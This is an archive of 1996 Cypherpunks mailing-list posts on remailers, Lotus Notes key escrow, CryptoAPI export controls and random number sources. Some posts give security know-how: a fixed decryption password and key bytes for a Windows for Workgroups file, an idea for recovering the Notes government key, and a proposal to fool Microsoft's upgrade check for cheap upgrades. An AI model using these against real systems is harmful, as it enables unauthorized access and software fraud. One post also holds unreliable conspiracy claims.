showing up in an A.V. search, and figured why not try
it out and see what comes up under one of my nyms...

Lo and behold, my nym corresponds with the title of a
popular comic strip and an episode in a bad TV show...

Crypto related?

Imagine your nym is related to something common-place at
the time of posting.  Even though you may be well known
under that nym, simple searches for that name will turn up
loads of crapola, or at least some light entertainment
for someone searching for oyur past posts.

(It can also turn some unsuspecting people looking for the
crapola onto your interests...)

Yes, I know that sophisticated search engines and simple
expressions can filter out most of the unwanted junk, but
not all of it.  Likewise filtering will let some of your
posts fall through the web-crawler-cracks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 17 Jan 96 09:00:42 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Alta Vista, Great Stuff!
In-Reply-To: <2.2.32.19960117111232.0095a67c@panix.com>
Message-ID: <Pine.LNX.3.91.960117085540.121A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 17 Jan 1996, Duncan Frissell wrote:

> My name is rare and matched mostly by lists of the highest points of
> elevation in each state (Mt. Frissell in Connecticut) and museum shows of
> the work of a distant cousin Toni Frissell who was a fashion photographer in
> NYC.  Most of the rest is mine.  If you have a common name/nym it would be
> harder to track (except by searching for email address rather than name).

I have a similar situation--"Corgan" is an invented name, so it is quite 
rare.  Most hits on my name are either Cpunks archives at hks.net or the 
motherlode of Billy Corgan (Smashing Pumpkins) stuff out there.

--
Johnathan Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 17 Jan 96 08:58:27 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: A Modest Proposal: Fattening up the Proles
Message-ID: <2.2.32.19960117165226.006b21e4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:24 AM 1/17/96 -0500, Timothy C. May wrote:

>(Ironically, I brought up the new book, "The Winner Take All Society," at
>the last Cypherpunks meeting. No time to discuss it here, but it confirms
>my strong belief that we are heading for a economy in which a shrinking
>fraction of workers have really valuable things to contribute, and a
>growing fraction of the population does not. 

The book suggests that small differences in perceived quality (or even
'luck') result in a big difference in marketplace results (whether for
product or labor).  The title is a bit misleading.  It should be "The
Winner-Take-Lots Society" since it does not say that non-winners are left
with nothing (that thesis is promoted in other recent works of fiction.)

These GenX whining tomes and commie sociology texts are just the latest
examples of the old automation-will-cause-mass-unemployment
so-we-need-Socialism-to-feed
the-unemployed arguments.  So far, a higher percentage of Americans are in
paid employment than ever before in history.  Likewise once you factor out
changes in the workforce mix, similarly situated workers continue to rake in
more "total compensation" than ever before.

Remember comparative advantage.  Just because Tim can apply his knowledge of
physics to the chip fab process better than anyone and make big bucks,
doesn't mean that everyone else is not needed.  Even Tim can't be everywhere
at once.  There is plenty for us lesser lights to do.  Tim himself certainly
purchases the goods and labor of many other people.  It may be true that a
disproportionate share of the gains accrue to "the elite" but if everyone
else is vastly richer than their forebearers, what difference does it make?
That is the likely effect of the nanotechnolgy revolution of which the
computer revolution is just the first part.

"The End of Work" is a real world example of the "Imminent Death of Usenet"
threads that wander their way throughout the Net.

DCF

"If everyone is so poor these days, why have air travel, dining out, and
retail floor space all tripled since the Carter administration?"

  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 17 Jan 96 08:59:44 PST
To: cypherpunks@toad.com
Subject: Re: on being elitist...
Message-ID: <2.2.32.19960117165241.006c49c8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:48 AM 1/17/96 -0600, Ed Carp, KHIJOL SysAdmin wrote:

>I would say that an "elitist" is one who believes that the masses (or the
>great unwashed, depending on your point of view) are somehow "not
>deserving" of surviving or "not worth it"

The contemporary PC definition of elitist is "One who believes that people
are capable of excellence."  And an anti-elitist is "One who believes that
people are utterly incapable of excellence."  Hence Public Education.

I'm sure that some on this list think that people will prosper at different
rates but I don't think too many expect a great die off of the masses
because of their inability to compete.

The cypherpunks relevance is that some members of this list want to use
cypherpunk tools to protect their differential income from *greedy*
governments who want to get their bloody hands on it.

DCF

"And Hillary said, 'Bill Gates is greedy because he has amassed a fortune of
US$15,000,000,000 but the US Government is a helpful Village because it
takes US$1,400,000,000,000 from us each year and does good things with it.'"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 17 Jan 96 14:15:31 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: A Modest Proposal: Fattening up the Proles
In-Reply-To: <2.2.32.19960117165226.006b21e4@panix.com>
Message-ID: <Pine.LNX.3.91.960117135833.111B-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 17 Jan 1996, Duncan Frissell wrote:

> The book suggests that small differences in perceived quality (or even
> 'luck') result in a big difference in marketplace results (whether for
> product or labor).  The title is a bit misleading.  It should be "The
> Winner-Take-Lots Society" since it does not say that non-winners are left
> with nothing (that thesis is promoted in other recent works of fiction.)

While I've not read the book, what you describe fits with the concept of 
"sensitivity to initial conditions" that chaos theory discusses.

In this context, what Tim describes is a "sharpening" effect--i.e., the 
differences in initial conditions necessary to distinguish between the two 
eventual outcomes described is becoming smaller.  

A neat way to visualize this is to picture what happens when you crank up 
the contrast on a black and white TV.

Eric Hughes made an interesting comment, something to the effect that 
this process only seems to be occurring in occupations that have 
something in common, like easy transfer of job skill from one 
worker to another, I don't quite remember.  Anyone remember specifically?

--
Johnathan M. Corgan
jcorgan@aeinet.com
http://www.aeinet.com/jcorgan.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Wed, 17 Jan 96 17:08:26 PST
To: cypherpunks@toad.com
Subject: Remailers and Me
Message-ID: <2.2.32.19960118010838.00697400@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This may sound like a clueless newbie question, but then it pretty much
_is_, redeemed only by the fact that I know it. :-)

Following a lead provided by another local newbie, I've been doing a bunch
of amateur remailer testing, looping messages from here through a given
remailer to a nym server, back through the remailer, to here, and toting up
the travel times.

The latency and reliability figures I'm getting bear little or no
resemblance to the info included with Private Idaho, discussed here, and
like that.

Question: is this anything to be concerned about? I'm assuming that the
folks doing ping testing are throwing far more clueful and automated
procedures at the problem, just for starters. But then I get the impression
that their methodology differs from what I'm doing here, too. (My aim was to
simulate "normal" use, at least for me, and to go on to test times through
combos of the most reliable sites later.)

Bruce "One ringy-dingy, two ringy-dingy" Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEQAwUBMP2cxH3AXR8sjiylAQF0dgfRAZ1Mm6OxLhIQmcWA/gli96RVsZWnODLw
HV5eUF8llVVL+XIzl7wuY9u9uiDdbi13mgWYx2PReYYoRZ6cGqCOMmqYyoCCS0Mr
drUckoohuERMMi6Yh8V9rHVLSdK49BXril8E/lQo7TxxwRyVASINrh7B22B6Ka1o
Ymd+kkjah2WkL0oE+qnNoMylhUc5WYbKaO5BskP91zmV6S4MTHinKDOs8EPGEM1H
ZzNBLXJk0C/kYwxTIaqq7I70BzYkSEPqXaT/2LMjzCvuz20pMN5jGGof6EmAQi3B
R2wbVKp9A8SmBtFHah+HkROFqulSzLKxglGkPKVGFIVK0Ao=
=JsYr
-----END PGP SIGNATURE-----

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 18 Jan 96 03:45:14 PST
To: cypherpunks@toad.com
Subject: Win95 Registration Wizard info
Message-ID: <2.2.32.19960118114705.008ccef8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I picked this link up from the Fringewear list.  It has some interesting
information for quelling rumors and starting new ones.

ftp://ftp.ora.com/pub/examples/windows/win95.update/regwiz.html

The author takes the registration Wizard in Win95 apart and shows exactly
what it does and what it looks for.  Some interesting information about the
encrypted database of product information it uses.

It has a complete list of all of the products that the registration looks
for.  (PGP is not one of them.)  Some interesting facts about what it does
look for however...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 17 Jan 96 19:13:42 PST
To: cypherpunks@toad.com
Subject: Ozzie on Notes Crater
Message-ID: <199601180313.EAA00883@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Ozzie Outlines New Feature At RSA Data Security
Conference

San Francisco, Jan. 17 -- Ray Ozzie, president of Iris
Associates, the developer of Lotus Notes, informed an
audience at the RSA Data Security Conference here today
that Notes Release 4, which began shipping this month,
utilizes a new method of security called "differential
workfactor cryptography." This new method allows the
International Edition of Notes to use an encryption key
equal in strength to the 64-bit key in the North American
Edition, without the use of "key escrow" technologies.

Ozzie explained that in the International Edition of
Lotus Notes Release 4, whenever an encrypted 64-bit bulk
data key is generated by the product, it is bound to a
"workfactor reduction field," giving the U.S. government
exclusive access to 24 of the 64 bits.  When using the
North American Edition of Lotus Notes within the U.S. and
Canada, however, full 64-bit encryption is employed
without the "workfactor reduction field."  The two
editions of Notes are fully interoperable.

"We are very pleased to have arrived at a pragmatic
short-term solution that addresses our international
customers' requests for greater security within Notes,"
Ozzie said.  "However, we continue to argue vigorously
that, due to clear and present threats to our global
information systems, all interests would be well served
by widespread use of strong, high-grade cryptography. 
Without substantial rethinking of U.S. cryptography
policy, particularly as it pertains to export controls,
our global and national economic security is at risk."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jan 96 04:07:34 PST
To: a-kurtb@microsoft.com
Subject: Re: underground digital economy
Message-ID: <2.2.32.19960118121001.00943868@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 PM 1/17/96 -0600, Jim Miller wrote:

>This is the part that bothers me.  Wouldn't a gateway between anonymous  
>e-money and identified e-money would stick out like a sore thumb to  
>agencies tracking the flow of identified e-money?  Wouldn't identified  
>e-money trails start and/or terminate at the gateway?  Once the gateway is  
>discovered, all clients on the identified e-money side of the gateway  
>would be discovered.

But those clients could be shell companies given to the "real" users.  As
long as one has a continuing opportunity for anonymous *spending* you can
transfer the value of the underground e-cash into useful goods and services.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 18 Jan 96 06:00:37 PST
To: Tom Johnston <tomj@microsoft.com>
Subject: CryptoAPI and export question
Message-ID: <9601181354.AA22368@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Tom Johnston writes:
 > We would ship a CSP development kit to a foreign vendor, and sign a CSP
 > developed by the foreign vendor, but only with the appropriate export licenses.

So you'll only perform the signing operations in the United States?

In other words, what if I'm in Egypt, and I develop a CAPI-compliant
DLL (or whatever).  Could I go down to the Cairo Microsoft office and
get my stuff signed there?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 18 Jan 96 05:13:17 PST
To: cypherpunks@toad.com
Subject: 01 16 96 CuD Cypherpunks-related Items
Message-ID: <Pine.BSD.3.91.960118081024.13631A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  Cypherpunks-related items in 01 16 96 Computer under- 
  ground Digest: 
 
 
  Cryptography and Privacy
 
  Justice Dept. press release: no PGP prosecution (fwd)
 
  FLASH: Phil Zimmermann case dropped!
 
  Letter to Wiesenthal Center in re "hate speech" ban
 
  AP/NYT: Jewish Groups Call for Internet Censorship

 
 
  CuD is available as a Usenet newsgroup: 
 
                 comp.society.cu-digest

 
  The most recent issues of CuD can be obtained from the
  Cu Digest WWW site at: 

           http://www.soci.niu.edu/~cudigest

 
  Cordially, 
 
  Jim 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 18 Jan 96 05:58:17 PST
To: cypherpunks@toad.com
Subject: 02 96 Wired: Cyperpunks-related
Message-ID: <Pine.BSD.3.91.960118085516.14159B@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  Cypherpunks-related items in 02 96 Wired: 
 
 
  
  TITLES                                         PAGES 
 
  Surveillance-on-Demand                           72 
 
  Spam King!                                       84 
 
  Cyphermilitia                                    95 
 
  Steve Jobs                                      102 
 
    [interview; see 162.2: "If the Web becomes 
    too complicated, too fraught with security 
    concerns...."] 
 
  Catching Kevin                                  119 
 
  Privacy Is History                              124 
 
  How Good People Helped Make A Bad Law           132 
 
    [FBI reverse-engineers EFF] 
 
 
  I may have overlooked some items. 
 
  Wired subscription requests: 1 800 SO WIRED. 
 
 
  Cordially, 
 
  Jim 
 
                                    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 18 Jan 96 06:32:10 PST
To: cypherpunks@toad.com
Subject: Returned mail: User unknown (fwd)
Message-ID: <Pine.SV4.3.91.960118093140.25459A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




Alan Horowitz
alanh@norfolk.infi.net

---------- Forwarded message ----------
Date: Thu, 18 Jan 1996 08:27:15 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON@infi.net>
To: alanh@larry.infi.net
Subject: Returned mail: User unknown

The original message was received at Thu, 18 Jan 1996 08:26:56 -0500
from alanh@localhost

   ----- The following addresses had delivery problems -----
Name Withheld by Request <anon-remailer@utopia.hacktic.nl>  (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to utopia.hacktic.nl.:
>>> RCPT To:<anon-remailer@utopia.hacktic.nl>
<<< 550 <anon-remailer@utopia.hacktic.nl>... User unknown
550 Name Withheld by Request <anon-remailer@utopia.hacktic.nl>... User unknown

   ----- Original message follows -----
Received: by larry.infi.net (Infinet-S-3.3)
	id IAA19226; Thu, 18 Jan 1996 08:26:56 -0500
Return-Path: alanh
Date: Thu, 18 Jan 1996 08:26:56 -0500 (EST)
From: Alan Horowitz <alanh@infi.net>
To: Name Withheld by Request <anon-remailer@utopia.hacktic.nl>
cc: "Alan Horowitz <alanh@infi.net> \"Timothy C. May\"" <tcmay@got.net>
Subject: Re: PPF #25 and the UN test
In-Reply-To: <199601180540.GAA14063@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960118080009.15630B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Very interesting. You make bona-fide sounding noises.

Now let me ask you this. Do you think that USA has, or will ever have, 
security organs as kick ass as the East Germans had?

Yet within a short time after the Soviets decided, to cede that whole part
of Europe, to the Bonn sphere of influence, those East German operatives 
were running to cover their ass.

Love of Liberty runs deep within the American psyche, analogously to the 
way that devotion to Islam runs deep in the Arab countries. The Islamists 
have plenty of sympathizers in various Arab security organs. Let's recall 
that President Sadat was shot by bona fide memmbers of the Egyptian 
military, in a highly organized operation.

If you were a CFR guy, would you bet your life that you could order 500
more Wacos, without having to fear that thre would be no loyalty problems
inside your chosen operating units? 

Let's accept that 20% of the SEALS said they'd confiscate legally-owned 
firearms from Americans....is 20% enough?    Of the other 80%, could you 
rely on _none_ of them to casue major, major problems?

The secret government has had total control of the economy, since the 
day the Federal Reserve was delegated the authority to create national debt.
America is already well-controlled for the benefit of Insiders. They 
really don't need to attain higher visibility or more power. They are 
anglo-saxons, not banana-republic cult-of-personality types. Does Walter 
Wriston have to worry about  Tim May deciding to stockpile blackpowder 
rifles?

The SEALs are cannon fodder. They know it.

Alan Horowitz 
alanh@norfolk.infi.net







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don Gaffney <gaffney@emba.uvm.edu>
Date: Thu, 18 Jan 96 06:36:28 PST
To: pgut01@cs.auckland.ac.nz
Subject: Re: A WfW security curiosity (possibly another security hole)
In-Reply-To: <199601180314.QAA19064@cs26.cs.auckland.ac.nz>
Message-ID: <Pine.3.89.9601180955.G9122-0100000@griffin.emba.uvm.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jan 1996 pgut01@cs.auckland.ac.nz wrote:

> When WfW is installed, it creates a file in the Windows directory called
> WFWSYS.CFG.  This is a standard Windows password file and may be decrypted with
> the password "23skidoo" (note that this is lowercase, since it's passed to the
> .PWL-handling code at a level which bypasses the usual password case smashing.
> The mangled 32-bit form which is passed to the RC4 key setup routine is { 0x67,
> 0x6F, 0xE3, 0x81 }).
>  
> WFWSYS.CFG seems to be mostly identical for the few copies I could get to, and
> WfW networking won't work without it.  Decrypting the file doesn't seem to give
> anything useful, the string "SYSTEM" and what looks like a few 8 or 16-numbers. 
> I don't know enough about how WfW networking works, but my (very vague) guess
> is that it contains some sort of cookie to uniquely ID each machine for
> resource sharing over a network.  If it does then it it's (yet another) pretty
> serious security hole, since it's encrypted with a fixed password and seems to
> be mostly identical over multiple machines.  OTOH it may be something to do
> with serial numbers so you can't install the same copy of WfW on multiple
> machines on a LAN.
>  
> Can anyone shed more light on it?
>  
> Peter.
>  
> 

This is the file used by admincfg.exe (on WFW3.11 disk 8). This file
contains "security" settings, such as whether or not to cache passwords
on disk (*.PWL files). 

There is no feature in WFW to prevent use of one copy on multiple
machines on a lan.

In terms of security, yes, the whole of Windows Networking is a bad joke.

(An interesting aside, it is possible to get a WfW "security" error
on start-up by having subst drives - weird, eh?)

_____________________________________________________________________
Don Gaffney
Engineering, Mathematics & Business Administration Computer Facility
University of Vermont
237 Votey Building
Burlington, VT  05405
(802) 656-8490
Fax: (802) 656-8802





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Trei Family <trei@iii.net>
Date: Thu, 18 Jan 96 06:52:17 PST
To: cypherpunks@toad.com
Subject: Espionage-enabled Lotus notes.
Message-ID: <199601181451.JAA25153@iii2.iii.net>
MIME-Version: 1.0
Content-Type: text



I've come up with a new term to describe the type of 'improved' security
in the new International edition of Lotus Notes:

'espionage-enabled'

It's specifically built for export, and has a backdoor to enable USG agents
to read the messages more easily. From the viewpoint of a foreign purchaser,
'espionage-enabled' seems an appropriate term.

If we spread this term sufficiently, we may be able to discourage the 
widespread adoption of this half-measure, and increase the pressure for
good, unencumbered crypto.

speaking only for myself,

Peter Trei
ptrei@acm.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 96 07:03:56 PST
To: Alan Olsen <alano@teleport.com>
Subject: Re: Win95 Registration Wizard info
In-Reply-To: <2.2.32.19960118114705.008ccef8@mail.teleport.com>
Message-ID: <199601181503.KAA06603@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen writes:
> I picked this link up from the Fringewear list.
[...]
> The author takes the registration Wizard in Win95 apart and shows exactly
> what it does and what it looks for.  Some interesting information about the
> encrypted database of product information it uses.

What, exactly, does this have to do with cypherpunks?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 96 07:20:16 PST
To: cypherpunks@toad.com
Subject: noise levels
Message-ID: <199601181520.KAA06653@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The noise levels around here are getting astounding.

Posts on windows registration wizards, gun control, unemployment,
Kevin Mitnick's underwear, and all the rest are most certainly NOT
doing us any good.

Here we are in the midst of IBM putting espionage enabled versions of
Lotus Notes out (someone should be putting out a hack to change the
embedded public key), Microsoft putting out a crypto API that could
potentially be of enormous interest, activity moving in the Karn
lawsuit, and all sorts of other important events, and YOU DUNDERHEADS
ARE MAKING IT IMPOSSIBLE TO CARRY OUT IMPORTANT DISCUSSIONS.

If you want to help the NSA in its mission to stop the dissemination
of strong crypto, by all means, continue posting garbage.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 18 Jan 96 08:53:09 PST
To: cypherpunks@toad.com
Subject: Re: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry
Message-ID: <199601181652.KAA13172@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Wall Street Journal, Jan 18, 1996
>
>IBM Compromises on Encryption Keys, U.S. Allows Export of
>More-Secure Notes
[...]
>The new overseas version of Notes, tagged Release 4, will give
>foreign users 64-bit security. But to get permission to export
>the software, Lotus agreed to give the government access to 24
>of those bits by using a special 24-bit key supplied by the
                        ^
>National Security Agency.
[...]

Does anyone know if there really is just one 24-bit key for every copy of
Lotus Notes or is this a miscommunication?  If there really is just one 24-bit
key for everyone, can't you just look for the bits that don't change among
different 64 bit keys?  (e.g. AND a "sufficiently large" number of 64-bit keys
together to find the 1's that don't change and then OR them to find the 0's
until you've got the 24 bit key).  Someone, please tell me that's not how it
works (or post the 24-bit key  :>).

                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 18 Jan 96 09:00:48 PST
To: Tom Johnston <cypherpunks@toad.com
Subject: Re: CryptoAPI and export question
Message-ID: <9601181700.AA02008@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Two points:  the CSP development kit is export-controlled; and signing a
>CSP developed by a foreign vendor is treated as a export -- so the signature
>is export-controlled.

>We would ship a CSP development kit to a foreign vendor, and sign a CSP
>developed by the foreign vendor, but only with the appropriate export licenses.

This could lead to problems. I'm not sure what the European Community reaction 
to US attempts to export its legal system will be. 

The problem is that the Lotus Notes scheme changes the previous deal. Before the 
European governments benefited from the US export control laws because they had 
wiretap abilities. Now they are denied wiretap capabilities and have the US able 
to snoop on all their traffic.

Could find yourselves in the middle of a nasty battle...

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 18 Jan 96 09:17:16 PST
To: cypherpunks@toad.com
Subject: Re: Espionage-enabled Lotus notes.
In-Reply-To: <9601181638.AA01736@zorch.w3.org>
Message-ID: <9601181216.ZM26755@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


On Jan 18, 11:38am, hallam@w3.org wrote:
> The problem with this system is that it is quite likely to suceed. Unlike
> Clipper which made unfettered access to encrypted material possible the
> escrowed key strength reduction means that the FBI can tap a significant
> number of locations, just not all of them.

The Lotus `solution' seems to be the action of an American company
shipping a product which effectively says to foreign users, "We don't
care about you as a market." That this is the so-called "export"
version is ironic. The keys are escrowed with the U.S. government,
and no one else. The French government should rightly cry foul, for
this is (a) encryption where they don't have the keys and (b) encryption
where another government *does*.

For the world where industrial espionage is supposed to be becoming
the top priority and  where there have already been ugly accusations among
teams at trade talks, the NSA has just scored a victory on two fronts.

They've forced a major company (they don't come much more major than IBM)
to ship a product which actually helps them in both aspects of their
mandate. Communications interception of foreign industries' groupware
is now easier for the U.S. than for any other country, while (and
this must be granted) the communications security of American
industries will be somewhat improved by this move.

This is a win for the NSA, whose mandate (much as their Canadian
counterpart) would appear to read:
	We help you make sure that no-one can read your e-mail, except us.

The sick thing is, Notes will probably *still* be the best choice,
despite these matters (compared to competition from other similar software,
and from the web). For all the `Notes is dead, long live the web'
talk, the web as I've used it lacks authentication and access control
beyond an all-or-none system. I'll go check w3.org again.

richard

- --
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMP6AYx1gtCYLvIJ1AQHd1gP9GkTInUub19NPVtIHARULq4g/ifCpMp4g
P1U5FwtHrAfoDvgmwP275JUj/4zfJZ6p7YYnI10ihPD/Jjt6RmEmU/1D6N2XAeuc
chr70nuWVpnUxUXhkSvhDcebDz/FejMAFx9ko3xIkQQDYYstsA+tJBadMPosC8Ec
PEMPVbdfkRA=
=zPD2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Thu, 18 Jan 96 10:42:17 PST
To: perry@piermont.com
Subject: Re: noise levels and hack-Microsoft
Message-ID: <199601181841.NAA19754@sable.cc.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 1/18/96 -0500, you wrote:
>
>"R. J. Harvey" writes:
>> At 10:20 AM 1/18/96 -0500, Perry wrote:
>> >
>> >Posts on windows registration wizards, gun control, unemployment,
>>           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>>    Well, I'm sure you're correct on most of those,
>> but the post on Microsoft using ENCRYPTED databases
>> of competitor programs as part of its plan to surreptitiously
>
>Actually, the database isn't encrypted -- its plaintext -- and the
>wizard isn't surreptitious and tells you everything its doing and lets
>you stop it if you like. In short, the topic has no cryptography
>or security relevance *AT ALL*.
>
   I don't mean to sound argumentative, but I'm wondering if you 
actually read the article cited earlier today by the person you were 
criticizing for 'noise.'  To quote from Andrew Schulman, the author 
of the piece he referenced, and a person who has more than a little 
credibility on such topics, 

        REGWIZ.EXE in turn loads a dynamic-link library,
        \WINDOWS\SYSTEM\PRODINV.DLL. This is the "Product 
        Inventory DLL," normally used for compliance checking of 
        upgrades to Microsoft Office programs such as WinWord.
        (In fact, PRODINV.DLL's internal module name is "COMPLINC," 
        for "compliance checking.") Of course, when you buy the 
        upgrade edition of something like WinWord, there needs to 
        be a mechanism to check that in fact you really are upgrading 
        from some previous word processor -- be it a previous version 
        of WinWord, or a competitor's word processor, such as AmiPro 
        or WordPerfect.  So there's an encrypted database (the reasons 
                                    ^^^^^^^^^^^^^^^^^^^^^
        for this encryption are discussed below) inside PRODINV of about 
        100 products, 

        ...

        At this point, it was trivial to locate the beginning and end 
        of the buffer, and write it to disk. (Recall that the database 
        is stored on disk in encrypted form; this is why a search of 
                          ^^^^^^^^^^^^^^^^^
        the entire hard disk did not find it.) 
        
        ...

        The database is encrypted because otherwise it would be trivial 
        to fool this "wizard" (hmm...; examination of RegWiz/ProdInv 
        shows it to be anything but wizardly) simply by creating an 
        appropriately-sized file with the appropriate name in the 
        appropriate subdirectory.

   Although I haven't personally verified the above, I'm quite
confident that Schulman is correct here.  Of perhaps greater
relevance to this list, the final passage cited above should
provide a potentially very interesting "project" for those
list-readers who are interested in the "hack Microsoft" project.
Schulman got at the cleartext by looking at the program in
a debugger, AFTER it had decrypted the database and loaded its
contents into memory; he didn't try to crack the encryption
method itself.
  My point is, if the crypto used here is as poor
as has been seen in the password area, and somebody were
to come up with a way to fool this "compliance checking"
protocol (which would defeat BOTH the "voluntary" registration
function and the potentially much more interesting reduced-
price product upgrading authentication mechanism), I think
that might constitute very poor PR for Micro$oft, as well
as a highly crypto-relevant issue.  That is, a hell of a
lot more people might exploit a flaw like that in order to 
falsely qualify for cheap upgrades than would ever be involved 
in exploiting the password cache problem.
   For those who missed it, and who care, the URL is 
ftp://ftp.ora.com/pub/examples/windows/win95.update/regwiz.html

rj





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Thu, 18 Jan 96 03:45:16 PST
To: cypherpunks@toad.com
Subject: RE: Random Number Generators
Message-ID: <960118135615.204012d1@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


From:	SMTP%"tcmay@got.net" 18-JAN-1996 06:33:11.77
>At 11:40 PM 1/17/96, Kurt Buff (Volt Comp) wrote:
>>If you're going to work with hardware to get really random numbers, why not
>>go to the back of any of several PC-type magazines, and order the radiation
>>detector board that someone is hawking? Can't really do any better than
>>that, can you? Counting cosmic ray hits and noting their time differentials
>                         ^^^^^^^^^^^^^^^
>>should be just what the doctor ordered, right?
>
>Almost all of the counts in simple radiation detectors are from earthly
>sources, not from cosmic rays. For Geiger tube counters (not very common
>these days), the main counts are for gamma rays and for beta particles (if
>
	... stuff deleted ...

The main problem I see on these sources is not their ramdomness, which, in
some instances may be not so good as one would expect, but their subscep-
tibility to tampering.

First, randomness: for radiactivity counters, decay is a log function of
time. This could be used to reduce keyspace search. Second, radiactivity
can be quenched. If you are measuring background levels, then you are
exposed to external influences too: to be extreme, one can expect your
counter to go mad after an atomic explosion in the neighborhood. This
reduces randomness and keyspace.

Second, tampering: the atomic bomb explosion is a good example: it is
possible to produce an external source of radiactivity and influence
your detector. Unless you measure alpha particles from a radioactive
source of yours... And even then, you'll have to buy your source...
